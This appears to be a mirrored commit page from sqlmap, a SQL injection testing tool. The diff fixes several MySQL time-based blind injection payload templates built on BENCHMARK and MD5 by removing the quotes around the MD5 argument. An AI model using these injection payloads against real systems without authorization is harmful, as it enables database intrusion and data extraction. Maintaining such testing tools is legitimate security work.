mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-10-31 07:57:47 +03:00
bug fix (playing with wavsep i've realized that we are sending in this payload quoted 'string' (causing problems), while MD5 also accepts integer values
This commit is contained in:
Miroslav Stampar
parent
412a97b7fe
commit
97f9c9d119
|
|
@ -1461,9 +1461,9 @@ Formats:
|
||||||
<risk>2</risk>
|
<risk>2</risk>
|
||||||
<clause>0</clause>
|
<clause>0</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
<vector>; IF(([INFERENCE]), BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')), [RANDNUM]);</vector>
|
<vector>; IF(([INFERENCE]), BENCHMARK([SLEEPTIME]000000, MD5([SLEEPTIME])), [RANDNUM]);</vector>
|
||||||
<request>
|
<request>
|
||||||
<payload>; SELECT BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]'));</payload>
|
<payload>; SELECT BENCHMARK([SLEEPTIME]000000, MD5([SLEEPTIME]));</payload>
|
||||||
<comment>#</comment>
|
<comment>#</comment>
|
||||||
</request>
|
</request>
|
||||||
<response>
|
<response>
|
||||||
|
|
@ -1732,9 +1732,9 @@ Formats:
|
||||||
<risk>2</risk>
|
<risk>2</risk>
|
||||||
<clause>1,2,3</clause>
|
<clause>1,2,3</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
<vector>AND [RANDNUM]=IF(([INFERENCE]), BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')), [RANDNUM])</vector>
|
<vector>AND [RANDNUM]=IF(([INFERENCE]), BENCHMARK([SLEEPTIME]000000, MD5([SLEEPTIME])), [RANDNUM])</vector>
|
||||||
<request>
|
<request>
|
||||||
<payload>AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]'))</payload>
|
<payload>AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000, MD5([SLEEPTIME]))</payload>
|
||||||
</request>
|
</request>
|
||||||
<response>
|
<response>
|
||||||
<time>[DELAYED]</time>
|
<time>[DELAYED]</time>
|
||||||
|
|
@ -1751,9 +1751,9 @@ Formats:
|
||||||
<risk>2</risk>
|
<risk>2</risk>
|
||||||
<clause>1,2,3</clause>
|
<clause>1,2,3</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
<vector>AND [RANDNUM]=IF(([INFERENCE]), BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')), [RANDNUM])</vector>
|
<vector>AND [RANDNUM]=IF(([INFERENCE]), BENCHMARK([SLEEPTIME]000000, MD5([SLEEPTIME])), [RANDNUM])</vector>
|
||||||
<request>
|
<request>
|
||||||
<payload>AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]'))</payload>
|
<payload>AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000, MD5([SLEEPTIME]))</payload>
|
||||||
<comment>#</comment>
|
<comment>#</comment>
|
||||||
</request>
|
</request>
|
||||||
<response>
|
<response>
|
||||||
|
|
@ -2097,9 +2097,9 @@ Formats:
|
||||||
<risk>3</risk>
|
<risk>3</risk>
|
||||||
<clause>1,2,3</clause>
|
<clause>1,2,3</clause>
|
||||||
<where>2</where>
|
<where>2</where>
|
||||||
<vector>OR [RANDNUM]=IF(([INFERENCE]), BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')), [RANDNUM])</vector>
|
<vector>OR [RANDNUM]=IF(([INFERENCE]), BENCHMARK([SLEEPTIME]000000, MD5([SLEEPTIME])), [RANDNUM])</vector>
|
||||||
<request>
|
<request>
|
||||||
<payload>OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]'))</payload>
|
<payload>OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000, MD5([SLEEPTIME]))</payload>
|
||||||
</request>
|
</request>
|
||||||
<response>
|
<response>
|
||||||
<time>[DELAYED]</time>
|
<time>[DELAYED]</time>
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue
Block a user